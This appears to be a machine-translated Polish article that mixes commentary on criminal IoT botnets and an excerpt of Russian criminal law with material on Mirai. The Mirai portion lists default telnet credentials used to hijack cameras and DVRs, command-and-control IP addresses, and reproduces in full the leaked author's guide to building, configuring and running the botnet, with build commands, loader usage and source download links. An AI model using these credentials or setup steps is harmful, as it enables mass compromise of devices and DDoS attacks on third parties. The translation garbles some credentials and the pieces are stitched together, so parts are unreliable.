Często używają uproszczonej wersji systemu operacyjnego opartej na rodzinie Linux. Złośliwe oprogramowanie botnetowe można łatwo skompilować dla powszechnie stosowanych architektur, głównie ARM/MIPS/x86.
Zredukowany system operacyjny automatycznie oznacza mniej opcji dotyczących funkcji bezpieczeństwa, w tym raportowania, więc większość zagrożeń pozostaje niezauważona przez właścicieli tych urządzeń.

Oto kolejny niedawny przykład, który pomoże zrozumieć moc, jaką może mieć nowoczesna infrastruktura przestępcza botnetów: w listopadzie 2017 r. botnet Necurs wysłał nowy szczep wirusa ransomware Scarab. W wyniku masowej kampanii wysłano około 12,5 miliona zainfekowanych wiadomości e-mail, czyli szybkość dystrybucji wyniosła ponad 2 miliony wiadomości na godzinę. Nawiasem mówiąc, ten sam botnet rozprzestrzeniał trojany bankowe Dridex i Trickbot, a także wirusy ransomware Locky i Jans.

wnioski

Wysoka dostępność i łatwość użycia bardziej wyrafinowanego i elastycznego szkodliwego oprogramowania do botnetów w ostatnich latach, w połączeniu ze znacznym wzrostem liczby niezabezpieczonych urządzeń IoT, sprawiły, że botnety przestępcze stały się kluczowym elementem rozwijającej się cyfrowej, undergroundowej gospodarki. Ta gospodarka ma rynki dla nielegalnie pozyskanych danych, złośliwych działań przeciwko określonym celom w ramach świadczenia usług do wynajęcia, a nawet dla własnej waluty. A wszystkie prognozy analityków i ekspertów ds. bezpieczeństwa brzmią niezwykle rozczarowująco – w dającej się przewidzieć przyszłości sytuacja z nadużywaniem botnetów do nielegalnych zysków tylko się pogorszy.

Wieczny paranoik, Anton Koczukow.

Zobacz też:

W zeszłym tygodniu do sieci wyciekły źródła składników botnetu Mirai, który był wykorzystywany w rekordowych atakach DDoS o przepustowości do 1 Tb/s.

Sztuka. 273 Kodeksu Karnego Federacji Rosyjskiej. Tworzenie, używanie i dystrybucja szkodliwych programów komputerowych

1. Tworzenie, rozpowszechnianie lub używanie programów komputerowych lub innych informacji komputerowych, świadomie przeznaczonych do nieuprawnionego niszczenia, blokowania, modyfikowania, kopiowania informacji komputerowych lub neutralizacji komputerowych środków ochrony informacji,

podlega karze ograniczenia wolności do lat czterech albo pracy przymusowej do lat czterech albo pozbawienia wolności na ten sam okres grzywną do 200 tys. rubli , lub w wysokości wynagrodzenia lub pensji lub innego dochodu osoby skazanej przez okres do osiemnastu miesięcy.

2. Czyny, o których mowa w ustępie 1 niniejszego artykułu, popełnione przez grupę osób za uprzednią zgodą lub przez zorganizowaną grupę, lub przez osobę zajmującą swoje stanowisko służbowe, a także wyrządzanie poważnych szkód lub popełnione z egoistycznych interesów, -

podlega karze ograniczenia wolności do lat czterech lub pracy przymusowej do lat pięciu, z pozbawieniem lub bez prawa zajmowania określonych stanowisk lub podejmowania określonych czynności do lat trzech, albo pozbawienia wolności do lat pięciu, z grzywną w wysokości od stu tysięcy do dwustu tysięcy rubli lub w wysokości wynagrodzenia lub innego dochodu skazanego na okres od dwóch do trzech lat lub bez niego oraz z pozbawieniem prawa do zajmowania określonych stanowisk lub wykonywania określonej działalności przez okres do trzech lat lub bez tego.

3. Czynności przewidziane w ustępach 1 lub 2 niniejszego artykułu, jeżeli spowodowały poważne konsekwencje lub stworzyły zagrożenie ich wystąpienia,

podlega karze pozbawienia wolności do siedmiu lat.

Ten botnet składa się głównie z kamer, urządzeń DVR itp.

Infekcja jest dość prosta: Internet jest skanowany w poszukiwaniu otwartych portów 80/23 (web/telnet) i wybierane są konta zakodowane na stałe.

Niewielu użytkowników zmienia hasła do wbudowanych kont (jeśli to możliwe), więc botnet jest stale aktualizowany o nowe urządzenia. Jeśli możesz zmienić hasło z poziomu interfejsu sieciowego, to hasło i sama obecność dostępu telnet po prostu umyka wielu użytkownikom.

Najczęściej używane konta to:

włącz: system
powłoka: sh
administrator:administrator
korzeń:xc3511
korzeń:vizxv
root:administrator
korzeń:xmhdipc
korzeń: 123456
korzeń:888888
wsparcie: wsparcie
korzeń:54321
korzeń:juantech
korzeń: anko
korzeń: 12345
Admin:
korzeń:domyślny
hasło administratora
korzeń:korzeń
źródło:
użytkownik:użytkownik
administrator:smcadmin
korzeń: pass
Administrator:admin1234
korzeń: 1111
gość:12345
korzeń: 1234
root:hasło
korzeń: 666666
Administrator:1111
usługa: usługa
system korzeniowy
przełożony: przełożony
korzeń: klv1234
administrator: 1234
korzeń:ikwb
korzeń: Zte521

Po uzyskaniu dostępu centrum dowodzenia otrzymuje binarne powiadomienie o obecności nowego bota:

4a 9a d1 d1 = XXX.XXX.XXX.XXX (adres hosta był tutaj)
05 = Tab
17 = 23 (port 23 Telnet)
05 = Tab
61 64 6d 69 6e = nazwa użytkownika:admin admin
05= Tab
61 64 6d 69 6e = hasło użytkownika: admin

Komponenty botnetu są zaprojektowane do pracy w różnych środowiskach, o czym świadczą zidentyfikowane próbki:

mirai.arm
mirai.arm7
mirai.mips
mirai.ppc
mirai.sz4

Serwery C&C są obecnie naprawione pod następującymi adresami:

103.1.210.27
103.1.210.28
185.130.225.65
185.130.225.66
185.130.225.83
185.130.225.90
185.130.225.94
185.130.225.95
185.70.105.161
185.70.105.164
185.93.185.11
185.93.185.12
200.170.143.5
46.249.38.145
46.249.38.146
46.249.38.148
46.249.38.149
46.249.38.150
46.249.38.151
46.249.38.152
46.249.38.153
46.249.38.154
46.249.38.155
46.249.38.159
46.249.38.160
46.249.38.161
80.87.205.10
80.87.205.11

Instrukcje tworzenia botnetu są dość proste, podaję taką, jaka jest (źródło http://pastebin.com/E90i6yBB):

Pozdrawiam wszystkich,

Kiedy po raz pierwszy zacząłem pracować w branży DDoS, nie planowałem pozostawać w niej długo. Zarobiłem pieniądze, teraz wiele oczu patrzy na IOT, więc czas na GTFO. Znam jednak każdy skid i ich mamę, ich mokrym marzeniem jest mieć coś poza qbotem.

Więc dzisiaj mam dla Was niesamowite wydawnictwo. Z Mirai zwykle ściągam maksymalnie 380 000 botów z samego telnetu. Jednak po Kreb DDoS dostawcy usług internetowych powoli zamykali swoje działania i porządkowali swoje działania. Obecnie maksymalne ściąganie to około 300 tysięcy botów i spada.

Więc jestem twoim senpaiem i będę cię traktować naprawdę miło, mój hf-chan.

I wszystkim, którzy myśleli, że robią cokolwiek, uderzając w moje CNC, dobrze się uśmiałem, ten bot używa domeny dla CNC. Ponowne połączenie wszystkich botów zajmuje 60 sekund lol

Powiadom też o tym wpisie na blogu przez malwaremustdie
http://blog.malwaremustdie.org/2016/08/mmd-0056-2016-linuxmirai-just.html
https://web.archive.org/web/20160930230210/http://blog.malwaremustdie.org/2016/08/mmd-0056-2016-linuxmirai-just.html<- backup in case low quality reverse engineer unixfreaxjp decides to edit his posts lol
Bardzo cię szanowałem, myślałem, że jesteś dobrym odwracaczem, ale tak naprawdę całkowicie i całkowicie nie udało ci się odwrócić tego binarnego. "Nadal mamy lepsze kung fu niż wy dzieciaki" proszę nie rozśmieszaj mnie, popełniłeś tyle błędów, a nawet pomyliłeś kilka różnych binariów z moimi. kupa śmiechu

Pozwól, że oddam ci kilka klapsów
1) port 48101 nie jest przeznaczony do połączenia wstecznego, służy do kontroli, aby zapobiec jednoczesnemu działaniu wielu botów
2) /dev/watchdog i /dev/misc nie służą do robienia opóźnień, ale do zapobiegania zawieszaniu się systemu. Ten jest nisko wiszący owoc, tak smutny, że jesteś bardzo głupi
3) Zawiodłeś i myślałeś, że FAKE_CNC_ADDR i FAKE_CNC_PORT to prawdziwe CNC, lol „I robisz backdoora, aby połączyć się przez HTTP na 65.222.202.53”. potknąłeś się o przepływ sygnału ;) spróbuj mocniej poślizgnąć się
4) Twoje szkieletowe narzędzie jest do dupy, myślało, że dekoder ataku jest „w stylu sinden”, ale nawet nie używa protokołu tekstowego? CNC i bot komunikują się przez protokół binarny
5) mówisz „chroot(„/”) tak przewidywalny jak torlus”, ale nie rozumiesz, niektórzy zabijają na podstawie cwd. Pokazuje, jak bardzo jesteś poza pętlą z prawdziwym złośliwym oprogramowaniem. Wróć do skidland

Dlaczego piszesz narzędzia inżynierii wstecznej? Przede wszystkim nie możesz nawet poprawnie odwrócić. Najpierw naucz się pewnych umiejętności, zanim spróbujesz zaimponować innym. Twoja arogancja w deklarowaniu, jak „pokonałeś mnie” swoim głupim stwierdzeniem kung-fu, sprawiła, że tak bardzo się śmiałem podczas jedzenia SO musiałem poklepać mnie po plecach.

Tak jak ja zawsze będę wolny, tak i ty będziesz na zawsze skazany na przeciętność.

Wymagania
2 serwery: 1 dla CNC + mysql, 1 dla odbiornika skanowania i 1+ do ładowania

Wymagania OP
2 VPS i 4 serwery
— 1 VPS z wyjątkowo kuloodpornym hostem dla serwera bazy danych
- 1 VPS, rootkit, dla scanReceiver i dystrybutora
- 1 serwer dla CNC (używany jak 2% CPU z 400k botów)
- 3 serwery NForce 10 gb/s do ładowania (dystrybutor dystrybuuje równo do 3 serwerów)

— Aby nawiązać połączenie z CNC, boty rozpoznają domenę (resolv.c/resolv.h) i łączą się z tym adresem IP
- Boty brute telnet używający zaawansowanego skanera SYN, który jest około 80x szybszy niż ten w qbot i zużywa prawie 20x mniej zasobów. Po znalezieniu wyniku brutalnego bot rozwiązuje inną domenę i zgłasza to. Jest on połączony z oddzielnym serwerem, aby automatycznie ładować się na urządzenia w miarę pojawiania się wyników.
- Wyniki brutalne są wysyłane domyślnie na porcie 48101. Narzędzie o nazwie scanListen.go w narzędziach służy do odbierania wyników brutalnych (w szczycie uzyskiwałem około 500 wyników brutalnych na sekundę). Jeśli kompilujesz w trybie debugowania, w folderze debugowania powinien pojawić się plik binarny narzędzia scanListen.

Mirai używa mechanizmu rozprzestrzeniania się podobnego do samopowtarzania, ale to, co nazywam „ładowaniem w czasie rzeczywistym”. Zasadniczo boty wysyłają brutalne wyniki do serwera nasłuchującego za pomocą narzędzia scanListen, które wysyła wyniki do modułu ładującego. Ta pętla (brute -> scanListen -> load -> brute) jest znana jako ładowanie w czasie rzeczywistym.

Program ładujący można skonfigurować tak, aby używał wielu adresów IP, aby ominąć wyczerpanie portów w systemie Linux (dostępna jest ograniczona liczba portów, co oznacza, że nie ma wystarczającej zmienności w krotce, aby uzyskać więcej niż 65 000 jednoczesnych połączeń wychodzących - teoretycznie ta wartość jest dużo mniej). Miałbym może 60 000 - 70 000 jednoczesnych połączeń wychodzących (jednoczesne ładowanie) rozłożonych na 5 adresów IP.
Bot ma kilka opcji konfiguracyjnych, które są zaciemnione w (table.c/table.h). W ./mirai/bot/table.h można znaleźć większość opisów opcji konfiguracyjnych. Jednak w ./mirai/bot/table.c jest kilka opcji, które *musisz* zmienić, aby zacząć działać.

- TABLE_CNC_DOMAIN - Nazwa domeny CNC do połączenia - Unikanie DDoS bardzo zabawne z mirai, ludzie próbują trafić na mój CNC, ale aktualizuję go szybciej, niż mogą znaleźć nowe adresy IP, lol. Opóźnieni :)
- TABLE_CNC_PORT - Port do połączenia, już ustawiony na 23
- TABLE_SCAN_CB_DOMAIN - W przypadku znalezienia wyników brutalnych ta domena jest zgłaszana do
- TABLE_SCAN_CB_PORT - Port, z którym chcesz się połączyć w celu uzyskania wyników brutalnych, jest już ustawiony na 48101.

W ./mirai/tools znajdziesz coś, co nazywa się enc.c — musisz to skompilować, aby wypisać rzeczy do umieszczenia w pliku table.c

Uruchom ten katalog w katalogu Mirai

./build.sh debugowanie telnet

Otrzymasz pewne błędy związane z brakiem kompilatorów skrośnych, jeśli ich nie skonfigurowałeś. To jest w porządku, nie wpłynie to na kompilację narzędzia enc

Teraz w folderze ./mirai/debug powinieneś zobaczyć skompilowany plik binarny o nazwie enc. Na przykład, aby uzyskać zaciemniony ciąg dla nazwy domeny, z którą mają się połączyć boty, użyj tego:

./debug/enc ciąg fuck.the.police.com
Wynik powinien wyglądać tak

XOR'ing 20 bajtów danych…
\x44\x57\x41\x49\x0C\x56\x4A\x47\x0C\x52\x4D\x4E\x4B\x41\x47\x0C\x41\x4D\x4F\x22
Aby na przykład zaktualizować wartość TABLE_CNC_DOMAIN, zastąp ten długi ciąg szesnastkowy ciągiem dostarczonym przez narzędzie enc. Widzisz także „XOR'ing 20 bajtów danych”. Ta wartość musi dobrze zastąpić ostatni argument tas. Na przykład wiersz table.c oryginalnie wygląda tak
add_entry(TABLE_CNC_DOMAIN, "\x41\x4C\x41\x0C\x41\x4A\x43\x4C\x45\x47\x4F\x47\x0C\x41\x4D\x4F\x22", 30); // cnc.changeme.com
Teraz, gdy znamy wartość narzędzia enc, aktualizujemy je w ten sposób

add_entry(TABLE_CNC_DOMAIN, "\x44\x57\x41\x49\x0C\x56\x4A\x47\x0C\x52\x4D\x4E\x4B\x41\x47\x0C\x41\x4D\x4F\x22", 20); //pieprzyć.policję.com
Niektóre wartości to ciągi, inne to port (uint16 w kolejności sieci / big endian).
KONFIGURUJ CNC:
apt-get install mysql-server mysql-client

CNC do działania wymaga bazy danych. Po zainstalowaniu bazy danych wejdź do niej i uruchom następujące polecenia:
http://pastebin.com/86d0iL9g

To stworzy dla Ciebie bazę danych. Aby dodać użytkownika

WSTAW WARTOŚCI użytkowników (NULL, 'anna-senpai', 'myawesomepassword', 0, 0, 0, 0, -1, 1, 30, ");
Teraz przejdź do pliku ./mirai/cnc/main.go

Edytuj te wartości
const DatabaseAddr string = "127.0.0.1"
const DatabaseUser string = "root"
const DatabasePass string = "hasło"
const DatabaseTable string = "mirai"
Do informacji o serwerze mysql, który właśnie zainstalowałeś

Kompilatory krzyżowe są łatwe, postępuj zgodnie z instrukcjami podanymi pod tym linkiem, aby skonfigurować. Aby zmiany zaczęły obowiązywać, musisz ponownie uruchomić system lub ponownie załadować plik .bashrc.

http://pastebin.com/1rRCc3aD
CNC, bot i powiązane narzędzia:
http://dopefile.pk/a9f2n9ewk8om
Jak zbudować bota + CNC
W folderze mirai znajduje się skrypt build.sh.
./build.sh debugowanie telnet

Wygeneruje debugowane pliki binarne bota, który nie będzie demonizował i wyświetli informacje o tym, czy może połączyć się z CNC, itp., stan zalania itp. Kompiluje się do folderu ./mirai/debug
./build.sh wydanie telnet

Wygeneruje gotowe do produkcji pliki binarne bota, które są bardzo okrojone, małe (około 60 KB), które należy załadować na urządzenia. Kompiluje wszystkie pliki binarne w formacie: „mirai.$ARCH” do folderu ./mirai/release

Loader odczytuje wpisy telnet z STDIN w następującym formacie:
ip:portuser:pass
Wykrywa, czy istnieje wget lub tftp i próbuje pobrać plik binarny za jego pomocą. Jeśli nie, załaduje echo małego pliku binarnego (około 1kb), który wystarczy jako wget.
./buduj.sh

Zbuduje ładowarkę, zoptymalizowaną, produkcyjną, bez zamieszania. Jeśli masz plik w formatach używanych do ładowania, możesz to zrobić
plik_cat.txt | ./ładowarka
Pamiętaj o ograniczeniu!

Żeby było jasne, nie zapewniam żadnych samouczków pomocy 1 na 1 ani gówna, za dużo czasu. Wszystkie skrypty i wszystko są dołączone, aby skonfigurować działający botnet w mniej niż 1 godzinę. Chętnie pomogę, jeśli masz indywidualne pytania (jak to się dzieje, że CNC nie łączy się z bazą, ja to zrobiłem to ten bla bla), ale nie pytania typu "Mój bot się nie łączy, napraw to"